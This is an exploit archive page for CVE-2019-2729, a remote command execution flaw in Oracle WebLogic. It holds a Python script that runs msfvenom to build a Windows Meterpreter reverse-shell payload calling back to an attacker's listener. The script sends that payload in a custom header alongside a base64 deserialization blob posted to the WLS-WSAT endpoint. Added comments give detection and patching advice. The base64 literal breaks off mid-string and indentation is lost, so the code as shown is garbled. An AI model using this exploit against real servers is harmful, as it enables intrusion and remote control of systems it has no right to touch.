
Oracle Weblogic 10.3.6.0.0 Remote Command Execution

Oracle Weblogic 10.3.6.0.0 Remote Command Execution
Posted Jan 9, 2020
Authored by Paveway3, Waffles

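Remote command execution exploit for Oracle WebLogic Server version 10.3.6.0.0 (CVE-2019-2729); the script's own header also lists 12.1.3.0.0 and 12.2.1.3.0. The script sends a text/xml SOAP POST to /wls-wsat/CoordinatorPortType with a <java> document inside the WorkContext header, and carries the generated command in a non-standard `lfcmd` request header. Both are visible in web or proxy logs that record request paths and headers.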

tags | exploit, remote
advisories | CVE-2019-2729
SHA-256 | 4ad6e21c3fcb977e0023dfe9a1803b6c73be6d865d1688b219b016e75cb5608d

Oracle Weblogic 10.3.6.0.0 Remote Command Execution

# Exploit Title: Oracle Weblogic 10.3.6.0.0 - Remote Command Execution
# Date: 2020-01-08
# Exploit Author: Waffles & Paveway3
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0
# Tested on: Windows
# CVE : CVE-2019-2729

SerialLogic.py

# Exploit Title: SerialLogic
# Date: 01-08-2020
# Exploit Author: Waffles & Paveway3
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0
# Tested on: Windows
# CVE : CVE-2019-2729

import argparse
import requests
import sys
import os
import base64

class bcolors:
    """ANSI escape sequences used to colour and style terminal output."""

    # Text attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

    # Foreground colours
    OKGREEN = '\033[92m'
    NONERED = '\033[91m'

    # Reset to the terminal's default rendering
    ENDLINE = '\033[0m'

# ASCII-art start-up banner; it is printed unconditionally, before any
# argument parsing takes place.
banner = """\n
_______ ________ ___ ____ _______ ___ ________ ____
/ ____/ | / / ____/ |__ \ / __ < / __ \ |__ \/__ /__ \/ __ \
/ / | | / / __/________/ // / / / / /_/ /_______/ / / /__/ / /_/ /
/ /___ | |/ / /__/_____/ __// /_/ / /\__, /_____/ __/ / // __/\__, /
\____/ |___/_____/ /____/\____/_//____/ /____/ /_//____/____/
"""

print(banner)

# Command-line interface: two payload switches, the target address, the
# callback address, and an optional HTTPS switch. The option table below is
# registered in the same order the help output lists them.
_SWITCH = dict(default=False, required=False, action='store_true')
_REQUIRED_VALUE = dict(default='', required=True)

parser = argparse.ArgumentParser()
for option, dest_name, help_text, extra in (
    ('-cs', 'cobaltstrike', "Use Cobalt Strike as callback", _SWITCH),
    ('-msf', 'metasploit', "Use Metasploit Handler as callback", _SWITCH),
    ('-rhost', 'target_host', "Target Host", _REQUIRED_VALUE),
    ('-rport', 'target_port', "Target Port", _REQUIRED_VALUE),
    ('-lhost', 'listen_host', "Listening host IP for callback", _REQUIRED_VALUE),
    ('-lport', 'listen_port', "Listening port for callback", _REQUIRED_VALUE),
    ('-ssl', 'usessl', "Use HTTPS instead of HTTP", _SWITCH),
):
    parser.add_argument(option, dest=dest_name, help=help_text, **extra)
args = parser.parse_args()

print("\n")

# Copy the parsed options into module-level names. The four address values
# are coerced to str; the three switches end up as real booleans (the
# original round-trips them through their string form, which is kept here).
target_host = str(args.target_host)
target_port = str(args.target_port)
listen_host = str(args.listen_host)
listen_port = str(args.listen_port)

cobaltstrike = str(args.cobaltstrike) == 'True'
metasploit = str(args.metasploit) == 'True'
usessl = str(args.usessl) == 'True'

# Produce the command string (the_cmd) that is later sent to the target.
# Exactly one of -msf / -cs must be set; any other combination prints a hint
# and exits. The two branches differ only in the msfvenom payload name
# (reverse_tcp vs reverse_http) and in the temp file they use.
# Both branches shell out to msfvenom with "-f psh-cmd" and read the result
# back from a fixed path under /tmp.
# NOTE(review): listen_host and listen_port are concatenated unquoted into a
# shell command line, and os.system()'s exit status is ignored, so a failed
# msfvenom run only surfaces as an error from open().
# NOTE(review): psh-cmd output is a PowerShell command line, so on a Windows
# target the host-side trace would presumably be PowerShell started by the
# WebLogic Java process. The object that consumes the command is in the
# encoded blob and cannot be read on this page, so confirm before relying on it.
if metasploit and not cobaltstrike:
os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_MSF.txt > /dev/null 2>&1")
with open('/tmp/CVE_2019_2729_MSF.txt', 'r') as msfcmd:
the_cmd = msfcmd.read()
elif cobaltstrike and not metasploit:
os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_CS.txt > /dev/null 2>&1")
with open('/tmp/CVE_2019_2729_CS.txt', 'r') as cscmd:
the_cmd = cscmd.read()
else:
print("Please try with ONE of the payload options.")
sys.exit()

# HTTP request headers. The generated command travels in the non-standard
# `lfcmd` header rather than in the request body.
# Detection: a request header named lfcmd, the fixed Firefox 60 User-Agent
# string and an empty SOAPAction on a text/xml POST are all visible to a
# proxy, WAF or access log that records request headers.
headers = {
'Content-Type':'text/xml',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',
'SOAPAction':'',
'lfcmd':'' + the_cmd
}

data_pref = '<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <array method="forName"> <string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string> <void>'
yss_payload = "CjxhcnJheSBjbGFzcz0iYnl0ZSIgbGVuZ3RoPSI2ODYyIj48dm9pZCBpbmRleD0iMTYwMSI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTM4MSI+PGJ5dGU+NjQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODkzIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEyMzUiPjxieXRlPjk5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTE1Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMDkyIj48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjE5Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIwOTEiPjxieXRlPjcyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjM1NCI+PGJ5dGU+MTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTY0Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNTc4Ij48Ynl0ZT4xMDQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4OTciPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE2MjUiPjxieXRlPjEyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjY0MSI+PGJ5dGU+NzI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MjYyIj48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM3MCI+PGJ5dGU+MTA1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjIxNiI+PGJ5dGU+NzQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MTQ3Ij48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMjU1Ij48Ynl0ZT4xMDk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDQiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE0ODQiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDEwOCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNjQyIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MzE4Ij48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjUyIj48Ynl0ZT4yMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjYzMjQiPjxieXRlPjI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0OTY1Ij48Ynl0ZT4xMDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MTcxIj48Ynl0ZT40OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2NTIiPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTc4MyI+PGJ5dGU+MTA5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjc2NiI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTU5NCI+PGJ5dGU+MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijk0MiI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDc4NiI+PGJ5dGU+NzY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMzU5Ij48Ynl0ZT4xMTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZ
GV4PSI1MzQxIj48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NTkiPjxieXRlPjExODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxNDgiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUyNjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU0MzIiPjxieXRlPjExNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIxMzkiPjxieXRlPjEwNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2Ij48Ynl0ZT4tMzU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTQ4Ij48Ynl0ZT44MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ3ODgiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTU0MSI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODgxIj48Ynl0ZT40PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTk0NyI+PGJ5dGU+LTc0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTIzNSI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTQ0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzNjEiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI5NDciPjxieXRlPjg3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjQwOCI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjE4MyI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTMyMCI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxODEzIj48Ynl0ZT4xMDM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODA4Ij48Ynl0ZT4xMTI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDMiPjxieXRlPjgzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDI4NiI+PGJ5dGU+MTE1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTY4OSI+PGJ5dGU+NDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTgwIj48Ynl0ZT42OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxMjEiPjxieXRlPjQ4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzEwMCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MTQyIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUzNyI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNDE3Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NDk4Ij48Ynl0ZT41OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5MzciPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjk4NSI+PGJ5dGU+MTA0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTUwMCI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTQ0NyI+PGJ5dGU+NTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMzA0Ij48Y
nl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUwOTciPjxieXRlPjczPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRl
# Base64-decode the embedded blob, append it to the SOAP prefix (data_pref)
# and POST the result to the WLS-WSAT CoordinatorPortType endpoint, over
# HTTPS when -ssl was given and plain HTTP otherwise. The request uses a
# 10-second timeout and the response is stored in `res`.
# data_pref opens a SOAP envelope whose WorkContext header contains a <java>
# document; the decoded blob is appended directly after it.
# NOTE: on this page the yss_payload literal is cut off (no closing quote),
# so the blob's contents beyond its visible start cannot be confirmed here.
# Defence: apply Oracle's fix for CVE-2019-2729 and do not expose /wls-wsat/*
# to untrusted networks. A POST to this path carrying a <java> element in
# the WorkContext header is worth alerting on.
data = base64.b64decode(yss_payload)
data_payload = data_pref + data.decode()
if usessl:
attackurl = "https://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")
else:
attackurl = "http://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")
res = requests.post(attackurl, headers=headers, data=data_payload, timeout=10)

# Report which payload type was sent, then delete the temporary msfvenom
# output file.
# NOTE(review): the "[+] Command executed" line is printed without looking at
# `res` (status code or body), so it only shows that the HTTP request
# returned; it is not evidence that the target was affected.
# NOTE(review): indentation was lost on this page; the two print calls are
# assumed to sit at top level, after the if/elif.
if cobaltstrike and not metasploit:
cmd_exec = "Cobalt Strike"
elif not cobaltstrike and metasploit:
cmd_exec = "Metasploit"
print(bcolors.OKGREEN + "[+] Command executed was a " + cmd_exec + " Payload, please check your console" + bcolors.ENDLINE)
print(bcolors.OKGREEN + "[+] Cleaning up...." + bcolors.ENDLINE)

# Cleanup is an if/elif chain, so at most one of the two temp files is
# removed per run.
if os.path.exists("/tmp/CVE_2019_2729_MSF.txt"):
os.remove("/tmp/CVE_2019_2729_MSF.txt")
elif os.path.exists("/tmp/CVE_2019_2729_CS.txt"):
os.remove("/tmp/CVE_2019_2729_CS.txt")